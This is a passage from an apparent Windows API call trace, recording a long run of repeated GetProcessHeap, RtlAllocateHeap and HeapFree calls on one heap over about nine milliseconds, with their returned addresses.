0x6825848 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0134.714] GetProcessHeap () returned 0xe30000 [0134.714] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.715] GetProcessHeap () returned 0xe30000 [0134.715] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.716] GetProcessHeap () returned 0xe30000 [0134.716] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.717] GetProcessHeap () returned 0xe30000 [0134.717] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0134.717] GetProcessHeap () returned 0xe30000 [0134.718] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.718] GetProcessHeap () returned 0xe30000 [0134.718] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.718] GetProcessHeap () returned 0xe30000 [0134.719] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.719] GetProcessHeap () returned 0xe30000 [0134.719] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.719] GetProcessHeap () returned 0xe30000 [0134.720] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.720] GetProcessHeap () returned 0xe30000 [0134.720] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.721] GetProcessHeap () returned 0xe30000 [0134.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0134.722] GetProcessHeap () returned 0xe30000 [0134.722] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.723] GetProcessHeap () returned 0xe30000 